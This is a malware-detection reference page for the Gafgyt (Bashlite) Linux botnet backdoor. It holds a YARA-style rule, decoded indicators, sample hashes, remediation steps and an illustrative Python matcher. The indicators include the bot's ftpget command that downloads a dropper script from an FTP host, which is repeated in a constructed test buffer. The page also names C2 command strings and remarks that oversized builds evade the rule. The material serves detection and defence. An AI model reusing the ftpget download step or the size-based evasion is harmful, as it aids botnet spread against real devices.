Concrete signature match: Backdoor - Provides unauthorized remote access for Linux platform, family Gafgyt
This threat is a backdoor from the Gafgyt malware family (also tracked as Bashlite, Qbot/Torlus and LizardStresser), which targets Linux hosts and embedded/IoT devices and enrolls them in a botnet. A compromised machine takes commands from the operator's command-and-control (C2) server and is used to launch Distributed Denial-of-Service (DDoS) attacks. The malware typically spreads on its own by scanning for other devices, most often over Telnet, that accept weak or default credentials, and installing itself on them.

The strings in the rule below are consistent with that behaviour. "SCANNER STOPPED" and "KILLATTK" are command and response strings from the bot's C2 command handler. $x_1_3 decodes to a BusyBox ftpget command line, "ftpget -v -u anonymous -p anonymous -P 21 <host> ftp1.sh ftp1.sh" with a 0-21 byte wildcard where the host goes, i.e. the bot fetching a dropper script from an anonymous FTP server. $x_1_4 and $x_1_5 are 32-bit x86 code from the bot's pseudo-random generator initialisation (init_rand in the leaked Gafgyt/Bashlite source): the XOR with 0x9e3779b9 (bytes 35 b9 79 37 9e) and stores to a global table at 0x08054380 (a3 80 43 05 08) are visible in the bytes. Because $x_1_5 hardcodes an absolute data address, it only matches non-PIE builds laid out like the sample it was taken from; the "2 of ($x*)" condition lets the more portable string indicators carry the detection when the code fragments do not hit.
No specific strings found for this threat
rule Backdoor_Linux_Gafgyt_W_2147797445_0
{
meta:
author = "threatcheck.sh"
detection_name = "Backdoor:Linux/Gafgyt.W!xp"
threat_id = "2147797445"
type = "Backdoor"
platform = "Linux: Linux platform"
family = "Gafgyt"
severity = "Critical"
info = "xp: an internal category used to refer to some threats"
signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
threshold = "2"
strings_accuracy = "Low"
strings:
$x_1_1 = "SCANNER STOPPED" ascii //weight: 1
$x_1_2 = "KILLATTK" ascii //weight: 1
$x_1_3 = {66 74 70 67 65 74 20 2d 76 20 2d 75 20 61 6e 6f 6e 79 6d 6f 75 73 20 2d 70 20 61 6e 6f 6e 79 6d 6f 75 73 20 2d 50 20 32 31 20 [0-21] 20 66 74 70 31 2e 73 68 20 66 74 70 31 2e 73 68} //weight: 1, accuracy: Low
$x_1_4 = {8b 4d fc 8b 45 fc 83 e8 03 8b 14 85 ?? ?? ?? ?? 8b 45 fc 83 e8 02 8b 04 85 ?? ?? ?? ?? 31 c2 8b 45 fc 31 d0 35 b9 79 37 9e 89 04 8d 80 43 05 08 ff 45 fc} //weight: 1, accuracy: Low
$x_1_5 = {55 89 e5 83 ec 10 8b 45 08 a3 80 43 05 08 8b 45 08 2d 47 86 c8 61 a3 84 43 05 08 8b 45 08 05 72 f3 6e 3c a3 88 43 05 08 c7 45 fc 03 00 00 00 eb 33} //weight: 1, accuracy: High
condition:
(filesize < 20MB) and
(2 of ($x*))
}

Hashes listed on the page (five 64-hex-digit values run together by the extraction; presumably SHA-256 of samples the rule matches):
2191afb2c4262dd513a776a3b7bdf9611274157a22905b7586bb2c7763ad6361
07fe72452f6ab996516bde953d29c0a75b1bb8e699ea32c13ad86c603be7da4a
f76d8568f0f331d8c4a118aab5fc4df4de3c502b20b5c5d13a02575bdfe98d9b
cdbb9c9e15bcc1361dc7acc5fe75643b6728c64ff4a200631d06c67c6a7053af
3625c3d81624dc6e8bc45b8569bab9c11601d17f52cc0deac30cd15583026716

Remediation: Isolate the affected Linux system from the network so it can no longer reach its C2 server or scan for and attack other hosts. Use the security product to remove the detected file and any persistence it set up (for example cron entries, init scripts or a modified rc.local). Then change all credentials on the device, in particular the default or shared Telnet/SSH passwords that Gafgyt brute-forces, apply firmware and system updates, and harden the system by disabling unnecessary services such as Telnet.
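To make the rule's condition concrete, the following is an added example (not from the original page and not threatcheck.sh code): a minimal matcher that translates the rule's hex strings, including the ?? wildcards and the [0-21] jump, into Python bytes regexes, applies the filesize and "2 of ($x*)" threshold, and runs against a constructed buffer. The sample buffer, its RFC 5737 host address 192.0.2.10 and the BENIGN buffer are made up for illustration; this is not a YARA engine and handles only the hex-string syntax this rule uses.

```python
import re

# Strings copied from the rule above. $x_1_1/$x_1_2 are plain ASCII; the other
# three are hex strings with '??' single-byte wildcards and a '[0-21]' jump.
RULE_STRINGS = {
    "x_1_1": b"SCANNER STOPPED",
    "x_1_2": b"KILLATTK",
    "x_1_3": ("66 74 70 67 65 74 20 2d 76 20 2d 75 20 61 6e 6f 6e 79 6d 6f 75 73 20 "
              "2d 70 20 61 6e 6f 6e 79 6d 6f 75 73 20 2d 50 20 32 31 20 [0-21] 20 "
              "66 74 70 31 2e 73 68 20 66 74 70 31 2e 73 68"),
    "x_1_4": ("8b 4d fc 8b 45 fc 83 e8 03 8b 14 85 ?? ?? ?? ?? 8b 45 fc 83 e8 02 "
              "8b 04 85 ?? ?? ?? ?? 31 c2 8b 45 fc 31 d0 35 b9 79 37 9e 89 04 8d "
              "80 43 05 08 ff 45 fc"),
    "x_1_5": ("55 89 e5 83 ec 10 8b 45 08 a3 80 43 05 08 8b 45 08 2d 47 86 c8 61 "
              "a3 84 43 05 08 8b 45 08 05 72 f3 6e 3c a3 88 43 05 08 c7 45 fc 03 "
              "00 00 00 eb 33"),
}
THRESHOLD = 2                    # condition: 2 of ($x*)
MAX_FILESIZE = 20 * 1024 * 1024  # condition: filesize < 20MB


def hex_pattern_to_regex(pattern: str) -> bytes:
    """Translate a YARA-style hex string into a bytes regex:
    'xx' -> literal byte, '??' -> any byte, '[a-b]' -> between a and b bytes."""
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")
        elif tok.startswith("[") and tok.endswith("]"):
            lo, hi = (int(n) for n in tok[1:-1].split("-"))
            parts.append(b".{%d,%d}" % (lo, hi))
        else:
            parts.append(re.escape(bytes.fromhex(tok)))
    return b"".join(parts)


def decode_fixed_bytes(pattern: str) -> str:
    """Render the literal bytes of a hex string as text, keeping wildcards
    verbatim, so the intent of a pattern such as $x_1_3 is readable."""
    return "".join(tok if tok == "??" or tok.startswith("[")
                   else bytes.fromhex(tok).decode("latin-1")
                   for tok in pattern.split())


def compile_rule() -> dict:
    """Compile every rule string to a regex; DOTALL so '.' also matches 0x0a."""
    compiled = {}
    for name, pat in RULE_STRINGS.items():
        rx = re.escape(pat) if isinstance(pat, bytes) else hex_pattern_to_regex(pat)
        compiled[name] = re.compile(rx, re.DOTALL)
    return compiled


def evaluate(data: bytes):
    """Apply the rule's condition to a buffer.
    Returns (sorted names of matching strings, whether the rule fires)."""
    matched = sorted(name for name, rx in compile_rule().items() if rx.search(data))
    fires = len(data) < MAX_FILESIZE and len(matched) >= THRESHOLD
    return matched, fires


# Constructed test input, NOT a real sample: an ELF-looking blob carrying the
# ftpget propagation command (RFC 5737 documentation address as the host), the
# KILLATTK command string, and the $x_1_5 code bytes verbatim.
SAMPLE = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 57
    + b"ftpget -v -u anonymous -p anonymous -P 21 192.0.2.10 ftp1.sh ftp1.sh\x00"
    + b"KILLATTK\x00PING\x00"
    + bytes.fromhex(RULE_STRINGS["x_1_5"])
)
BENIGN = b"\x7fELF" + b"KILLATTK\x00"  # one indicator only: below threshold


if __name__ == "__main__":
    print(decode_fixed_bytes(RULE_STRINGS["x_1_3"]))
    print(evaluate(SAMPLE))   # (['x_1_2', 'x_1_3', 'x_1_5'], True)
    print(evaluate(BENIGN))   # (['x_1_2'], False)
```

Two things worth noticing when running it: a buffer with only one indicator does not fire, which is the point of the threshold, and the same buffer padded past 20 MB stops firing even with three matches, so a packed or bloated build evades this particular rule by size alone.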